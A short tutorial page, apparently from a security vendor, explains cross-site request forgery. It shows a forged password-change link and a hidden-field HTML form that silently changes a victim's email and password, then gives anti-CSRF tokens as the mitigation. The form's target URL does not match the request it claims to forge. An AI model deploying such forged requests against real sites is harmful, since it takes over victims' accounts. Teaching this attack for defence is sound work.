# Cross Site Request Forgery (CSRF)

 

 

Overview

CSRF is an attack that forces an victim user to perform unwanted actions like transferring funds, changing password or email.

How it works.

its all about performing an action that we can't do but our victim has the privilege to do it (eg. changing his own password).

We have several approaches for this attack, but we have to know how can we generate a valid malicious request to let to trick out victim into launching it.

so Firstly we will attempt to change our password to Very $ecret in our account and look at the request

GET /change_password/?new_password=Very%20$ecret HTTP/1.1
Host: website.com

Now we will embed the following url with in our malicious website with the desired password

<a href="http://example.com/change_password/?new_password=Hacked!!!">Click Me!</a>

Once the victim clicks it , a request will be launched changing his password to the one we chose previously !

let's see another example with POST method

Let's assume that we want to forge the following request:

POST /profile/edit HTTP/1.1
Host: website.com

email=Hackers_Email@hacker.com&password=Hackers_Password

so we will have to embed the following html in our malicious page


<form action="<nowiki>http://bank.com/transfer.do</nowiki>" method="POST">
<input type="hidden" name="email" value="Hackers_Email@hacker.com"/>
<input type="hidden" name="password" value="Hackers_Password"/>
<input type="submit" value="Click ME !"/>
</form>

Once the user click it, email and password will be changed to the ones in the request.

Mitigation

Using Anti-CSRF Tokens:

its a random token supplied by the server for each client and it should be sent from the client to the server and validated by the server for each request, and it's usually a post or get parameter and can be also a http header.

References

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Ready to be protected?

14 days trial , No credit card upfront , Risk free